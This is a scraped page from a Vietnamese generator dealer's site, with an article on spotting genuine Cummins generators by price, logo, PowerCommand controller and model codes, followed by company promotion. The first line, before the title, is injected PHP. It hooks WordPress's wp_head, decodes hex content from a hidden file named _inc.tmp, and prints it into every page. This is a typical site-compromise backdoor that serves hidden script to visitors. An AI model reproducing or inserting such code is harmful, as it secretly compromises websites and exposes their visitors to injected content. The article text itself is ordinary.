if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Cách nhận biết máy Cummins chính hãng - Maritime Solutions

0768303666

.st0{fill:#FFFFFF;}

Tin tức

Cách nhận biết máy Cummins chính hãng

 Tháng Năm 9, 2021

By  minhvu

Thị trường máy phát điện ở Việt Nam được ưa chuộng nhất là dòng máy phát điện Cummins. Bài viết này giúp khách hàng nhận biết máy Cummins chính hãng.

Đặc điểm máy Cummins chính hãng

Thị trường máy Cummins rất phổ biến khiến cho nhiều người kinh doanh thiếu đạo đức sẽ làm giả, làm nhái các phụ kiện của máy. Vì vậy, chúng tôi đưa đến khách hàng các đặc điểm của máy Cummins chính hãng sau:

Máy phát điện Cummins Trung Quốc giá rẻ, chất lượng
Máy phát điện Cummins Trung Quốc giá rẻ, chất lượng

Về giá cả

Đầu tiên, khách hàng luôn ưu tiên tìm cho mình chiếc máy phát điện phù hợp với giá trị kinh tế phù hợp.

Hàng chính hãng bao giờ cũng có mức giá cao hơn, thậm chí cao gấp 3-4 lần so với các loại máy khác. Nhiều người khi đi mua luôn chọn những địa chỉ không uy tín để mua với giá rẻ, thấp hơn so với các công ty, trung tâm lớn. Tuy nhiên bạn nên hiểu rằng giá thành bao giờ nó cũng tỷ lệ thuận với chất lượng, chất lương cao mà giá rẻ là không có.

Logo của thương hiệu Cummins

Thương hiệu lâu đời của dòng máy Cummins
Thương hiệu lâu đời của dòng máy Cummins

 Tất cả các máy phát điện do chính Cummins chế tạo đồng bộ đều được gắn Logo Cummins Power Generation được gọi với cái tên là máy phát điện Cummins đồng bộ chính hãng. Và máy phát điện Cummins đồng bộ chính hãng sử dụng đầu phát Stamford do Cummins Generator Technology chế tạo.

Bộ điều khiển của PowerCommand

Thêm một điểm lưu ý nữa chính là về bộ điều khiển của PowerCommand sản xuất không được phân phối ra ngoài thị trường Mỹ nên mọi bộ điều khiển được sử dụng ngoài thương hiệu này chính là hãng không chính hãng USA bởi không nhà sản xuất nào khác có thể sở hữu được thiết bị này.

Máy phát điện Cummins đồng bộ chính hãng sử dụng bảng điều khiển PowerCommand do chính Cumnins phát triển, với các ký hiệu là PS0500, PCC1302, PCC2300, PCC3300, PCC3100, PCC2100, PCC3200…

 Các ký hiệu model tổ máy Cummins chính hãng

Máy phát điện Cummins đã chuẩn hóa cho thị trường toàn cầu, với tần số nguồn điện hạ thế sử dụng là 50Hz phù hợp với Việt Nam, có công suất dự phòng từ 8 đến 3300 Kva bao gồm: C8D5, C11D5, C17D5, C33D5, C38D5, C300D5, C700D5,…. Ngoài những ký hiệu model này Cummins Power Generation không sử dụng ký hiệu nào khác và cũng không cho phép bất kỳ nhà sản xuất phụ tùng gốc( OEM) nào được phép sử dụng cho sản phẩm máy phát điện không do Cummins Power Generation sản xuất.

>>Xem thêm: Địa chỉ bán máy phát điện Cummins giá tốt Hà Nội

Maritime Solutions cung cấp máy Cummins chính hãng uy tín chất lượng

Với 15 năm kinh nghiệm trong cung cấp và bảo hành máy phát điện, công ty đã đào tạo được đội ngũ nhân viên rất chuyên nghiệp. Nhân viên ở mỗi mảng trong công ty đều được đào tạo bài bản và liên tục được nâng cao tay nghề. Từ các nhân viên tư vấn, nhân viên bán hàng và bảo hành đều có kinh nghiệm không dưới 5 năm. Điều này khiến cho tổ chức của Maritime Solutions ngày càng đón nhận nhiều sự tin tưởng của khách hàng.

Dịch vụ máy phát điện ỏ Maritime Solutions

Tự hào là nhà phân phối uy tín với lượt khách hàng đáng kể, Maritime Solutions cam kết cung cấp máy phát điện tốt với: Giá thành hợp lí nhất; Bảo hành lâu dài và chăm sóc máy trong 5 năm; Vận chuyển nhanh, an toàn, lắp đặt tại nhà; Cung cấp các dong máy với giấy tờ chứng nhận đầy đủ; Có nhiều sản phẩm cho khách hàng lựa chọn;…

Các dịch vụ khác

Maritime Solutions cung cấp các sản phẩm nhập khẩu chính hãng như các dòng máy phát điện (máy Cummins, máy Doosan…); các thiết bị máy hàng hải

Bên cạnh việc mua bán các sản phẩm, công ty còn cung cấp các dịch vụ sửa chữa, bảo dưỡng các sản phẩm kể trên; các dịch vụ du lịch du thuyềnsửa chữa tàu biển,…

Các sản phẩm, dịch vụ đang được cung cấp tại Maritime Solutions luôn đảm bảo với khách hàng về cả giá thành và chất lượng. Cam kết làm hài lòng tất cả khách hàng khi đến với công ty.

minhvu


Your Signature

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Liên hệ với chúng tôi để được tư vấn Dịch vụ và giá cả tốt nhất 

>